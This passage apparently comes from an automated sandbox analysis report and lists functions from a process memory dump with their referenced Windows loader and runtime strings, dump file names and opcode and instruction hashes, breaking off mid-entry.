LdrResGetRCConfig Enter, xrefs: 059F35EC
LdrResGetRCConfig Exit, xrefs: 059F35FE

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 2545e6e152f974fa5f6efd56a2164088df6ff7d4b42368443c1552c614780e23
Instruction ID: 3275a9023a68b2f02b1d2d4591305982790040780e750fbccf62273aadb1a594
Opcode Fuzzy Hash: 2545e6e152f974fa5f6efd56a2164088df6ff7d4b42368443c1552c614780e23
Instruction Fuzzy Hash: 5D31CF312097859BD311DB29D849B2AB7E8FF85714F050C6AF9558B390EB38E905CB92

Function 059934B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 059D2A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 059D2A95

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 4e74d886f445f12f43aa49146023ba9203177a2a2be2b851dc89b53a5db1a9e7
Instruction ID: 9e2855c898c5499c08fa8f0c772144ecca38bee11ba8d4bc16ee33d54be6eab8
Opcode Fuzzy Hash: 4e74d886f445f12f43aa49146023ba9203177a2a2be2b851dc89b53a5db1a9e7
Instruction Fuzzy Hash: 9011CA75704204ABEF2A8F4C8D45F6AB7ADEBD4B54F1584297905DB284D674DD0086A0

Function 0599A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0599A5E9
Cleanup Group, xrefs: 0599A5E4

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 007fe56f1029bee9c8d9f8103c21c658e254d027e80ba4a1145f2a5d2af81788
Instruction ID: 7a1dfecca46884f6a48604345636dc03f73be9577da633390effc54428ea2e76
Opcode Fuzzy Hash: 007fe56f1029bee9c8d9f8103c21c658e254d027e80ba4a1145f2a5d2af81788
Instruction Fuzzy Hash: 5D01D1B2254784AFD715DF18CD4AF167BE8E788716F018939B548C7590E734E804CB46

Function 0596C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0596C8C3, 0596CA40

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: eb91fcda4beaf3db3a2d2e61a4981424db4d6cea80c304a44ffedeb90d52a27a
Instruction ID: 14e99e87524b497c09fdf1dbe84aaabfc0028556063129278dbe1e46871e3f84
Opcode Fuzzy Hash: eb91fcda4beaf3db3a2d2e61a4981424db4d6cea80c304a44ffedeb90d52a27a
Instruction Fuzzy Hash: B8825E75E043589FDB24CFA9C884BADB7B6FF44310F148169E85AAB350D734AD49CB50

Function 0599F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56b42b3c5b92ac2df26ad5418c1ba5ddf8f100bda5764b615beb104cda2ee50
Instruction ID: 4f790d01c366c01ede9479237108d1a67faf7e0b4353dc34ad9d3b4eedb1f5a8
Opcode Fuzzy Hash: e56b42b3c5b92ac2df26ad5418c1ba5ddf8f100bda5764b615beb104cda2ee50
Instruction Fuzzy Hash: B04109B5D00388AFDF25CFA9C481AADFBF8FB48340F54856EE559A7211DB30A945CB60

Function 059E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 059E65C1

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 79949f5e243dcb53aa60e642ebcc9609200c1eff1bf2e1a3cf190538e0dc3926
Instruction ID: 63eb98838ae5469cf565c09ce65b44c8a15d2981e5a528fa9113e8cbf11c7fdb
Opcode Fuzzy Hash: 79949f5e243dcb53aa60e642ebcc9609200c1eff1bf2e1a3cf190538e0dc3926
Instruction Fuzzy Hash: BB917372A00619AFEB22EF94DC85FAEB7B9EF45B50F140455F601AB190DB74ED00CBA0

Function 0599A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 059D67C9

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: b7c6aa266f96e4baa4cff7ec289a27e3fbda1d2a584a1349f769a1d90c3e6534
Instruction ID: baa1b56bd7988d1dd8657668ae335cdb303aae4f1ce267e7e3e240755f19f0fe
Opcode Fuzzy Hash: b7c6aa266f96e4baa4cff7ec289a27e3fbda1d2a584a1349f769a1d90c3e6534
Instruction Fuzzy Hash: CB716D75E0431A9FDF68CF98D590AADFBB6BF88710F14C52EE806A7240D7359941CB60

Function 0596973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 059697F3

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 511d89cbe26c9ef3923d48a66a8a3f9d93365ba31b082d1c8dfe4dee3078dd19
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: E9619B75D04219EFDF21DFA9C844BAEBBB9FF84710F14456AE811B7290D7389A04CBA1

Function 059EF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 059EF867

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: f5e79be72377ac473acfb26b1de02e493cd5e6493a137da43ae1370ac92585ef
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: B151AE72608745BFE722DF14C844F6BB7E8FB84750F05092AB98197290E774ED04CBA2

Function 0597E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0597E6A4

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 94274e3b90238ee9bb9fc5995d313dcb17d3b16a07eb9c028b9428ec3642a491
Instruction ID: cb8ffaa81b70c84866aba3af555581161b3c77c9f5c585f2ba239e988cb28b65
Opcode Fuzzy Hash: 94274e3b90238ee9bb9fc5995d313dcb17d3b16a07eb9c028b9428ec3642a491
Instruction Fuzzy Hash: 6D417F72608309ABD710DA75C944B6BB7ECAFC8B14F4809AEF985D7140E774E908C796

Function 059DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 059DC77F

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 64261d194fc7808ff8f6a0ced7effa3bad2055fa0fc0c25ba451cc6660335725
Instruction ID: 62143f39fcfe428018ac5bd54fb56eab611315c738fda966245621fa2ea8c65e
Opcode Fuzzy Hash: 64261d194fc7808ff8f6a0ced7effa3bad2055fa0fc0c25ba451cc6660335725
Instruction Fuzzy Hash: 5E4114B2D1062CABDF21DB50CC85FDEB77CAB45754F0085A5E608AB140DB74AE89CFA4

Function 059E97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 059E9870

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 14466472c88d8b354eb5d36009c24d2bbbe5a63d688d1410a8e6a898293552d8
Instruction ID: b347883601e3db79c699e85a60f1dd5d01ca4d683351f073f5e4509ee9ddaa67
Opcode Fuzzy Hash: 14466472c88d8b354eb5d36009c24d2bbbe5a63d688d1410a8e6a898293552d8
Instruction Fuzzy Hash: FA31C571B14301AFDB259F289851F3AB7E9FB88310F94843AE945DF3A1EA358C81C790

Function 05997505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 059D4622

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 7f156c059a89e842c6e26fd0535fa1eed2cc38b8d11fcdc771a770c741998df3
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: F241B075A10616EBCF69DF88C490BBEB7B9FF85701F00445AE946A7240DB31E941CBE2

Function 059936EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 05993731

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 50b81f4aa3dc9629c2774049fa3f5cdeb0860fe455d34488c4fd40e9da61a138
Instruction ID: 8507751ad9fe222d7f636fb9c5d4a8bf6b9301475e2b2ae5afb777b49b1dd901
Opcode Fuzzy Hash: 50b81f4aa3dc9629c2774049fa3f5cdeb0860fe455d34488c4fd40e9da61a138
Instruction Fuzzy Hash: F541BCB92053019FDB18CF18C484A26FBE9FF89710F18896EE44ACF251DB71D942CBA1

Function 05959730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

L4CwL4Cw, xrefs: 059597A7

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: L4CwL4Cw
API String ID: 0-1654103815
Opcode ID: e931e829e5d4bfb1fedfc30d9e0b2a6bfdc8d5ebd7a6ca2a8218d1e6dc03b6cc
Instruction ID: f83a84755d6318ba132bec94edc676a6965009859d5ce8fabe3147444b73ffeb
Opcode Fuzzy Hash: e931e829e5d4bfb1fedfc30d9e0b2a6bfdc8d5ebd7a6ca2a8218d1e6dc03b6cc
Instruction Fuzzy Hash: EC218675604718EFE722DF688804F5A7BB6FBC4B60F15082AEE559B350D770E811CB90

Function 05965096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 059650BF

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 111cb7738befcd2c462ffb92b2767f05232da8cebdd6e99c69ec6e459d739237
Instruction ID: d9d04c567c064e99eb5bd8f1dcf78074c30b91dcb56b8cfddd195e627613146d
Opcode Fuzzy Hash: 111cb7738befcd2c462ffb92b2767f05232da8cebdd6e99c69ec6e459d739237
Instruction Fuzzy Hash: B011B930309602DBDB248A1D885463677DFFB95354FB7892AD496CB351E771DC45C381

Function 059F8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51a59262ee4c30a1ed7efc1769602ae7143ba8f76407d574a16fd00aacb73ced
Instruction ID: 2fc6d8697df7e1af402c29eb89c3f79058287b146ac87ba3904fe7665fb9ac95
Opcode Fuzzy Hash: 51a59262ee4c30a1ed7efc1769602ae7143ba8f76407d574a16fd00aacb73ced
Instruction Fuzzy Hash: CA425D75E102199FDB64CF69C881BADB7F6FF88310F188099E949EB241D734A985CF60

Function 05A0A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c253f4882fc2b29c3e748320d2f3dbf2bf8253974c06aa3c6a08f3f7a26eee3
Instruction ID: 503058cffde4d2c82b722da3a64b5e08ac6ce1f6ea6317b0a7627f43355e3c9e
Opcode Fuzzy Hash: 8c253f4882fc2b29c3e748320d2f3dbf2bf8253974c06aa3c6a08f3f7a26eee3
Instruction Fuzzy Hash: 8622DF742287518BDB24CF29E094B72B7F2BF44300F08955AE9A78F6C5E735E492CB61

Function 05A216CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56a8c80f8c2e2ae1314f48d46c65442febd361eb052d0c558aa2f26c3db53e4
Instruction ID: 893047ac2a37e7e7d3954646ffd4437ccb28f83ed4c8597d36ef91517877574c
Opcode Fuzzy Hash: e56a8c80f8c2e2ae1314f48d46c65442febd361eb052d0c558aa2f26c3db53e4
Instruction Fuzzy Hash: E9227E35B042268BCB19CF59C491EBEB7B2FF88314B14856DD866DB344DB30A942CB90

Function 059665D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e82cc472159df55e77d923f47279a758d6a6ac1fb9474ac7d8e2b73ae9b40c7
Instruction ID: ec2835df8bb319d2f6144b72025dada1526f6a8e47bceab8479ec94a28a6ac42
Opcode Fuzzy Hash: 2e82cc472159df55e77d923f47279a758d6a6ac1fb9474ac7d8e2b73ae9b40c7
Instruction Fuzzy Hash: A2E19E71608341CFC714CF28C590A6ABBE6FF89314F158A6DE8998B351DB31E909CB92

Function 0596D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f19268c61a4b8d2b258bbaddb30e7db7369db8a45c3cf6140aa854a43f301d
Instruction ID: 4d7c1bae868dbaf2aa353ec2f28fd8865e7b9d1047ea1722f30ba4277d987831
Opcode Fuzzy Hash: 63f19268c61a4b8d2b258bbaddb30e7db7369db8a45c3cf6140aa854a43f301d
Instruction Fuzzy Hash: CBC1C471F043069BDF24CF58C954BAEBBBAFF94310F1482ADD865AB280D774A945CB81

Function 0597F460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5ba0da2312ab18f8b61d63f95439ea1893a846fc4d286f10655f5db4df87de
Instruction ID: 85ba8ac9d3031d2182513cf113a1701aa04632e1262546a437bba339fe16e2a1
Opcode Fuzzy Hash: aa5ba0da2312ab18f8b61d63f95439ea1893a846fc4d286f10655f5db4df87de
Instruction Fuzzy Hash: 46C16471A1422DCBDB24CF18C5D4BB9B7A6FF84704F09415AEC42AF3A1E7709941CBA4

Function 05970535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: fa6e938c97d4e6933b4c8fd088eb910b63fc543360692dc415322569e1076d51
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: DBB12231704649AFDF21CB69C858BBEBBFABF84200F19059AD556DB281DB30E941CB91

Function 059890DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 216312cbdc63b688f21a87fdda861cd5b6abd3d6a22004392a47c0de34d6f4a0
Instruction ID: 34083b03f791e4b252ed30ceed3d6949e948c3f7722ace377d8799df5088ebbc
Opcode Fuzzy Hash: 216312cbdc63b688f21a87fdda861cd5b6abd3d6a22004392a47c0de34d6f4a0
Instruction Fuzzy Hash: 4AA15272A14259AFEB12DF64CC45FBE7BB9AF85750F0500A4F900AB2A0D775ED10CBA1

Function 0595C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72fc6770a2111f3aebdde34e99774eb97bb1a6408a0211d60513b259950ca02
Instruction ID: 89aa7168b995c51eb59cbcd2be6e3f5d62675f095e0d71252ebc7ad95890c076
Opcode Fuzzy Hash: e72fc6770a2111f3aebdde34e99774eb97bb1a6408a0211d60513b259950ca02
Instruction Fuzzy Hash: 1BB16270B042558BEB65DF64C994BB9B3F6FF84710F0485E9D90AE7240EB749E86CB20

Function 0598E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4141cedb56d7b19232a7a77da20ac89170cd25ea2637fc9c1f751b92cdbf3c00
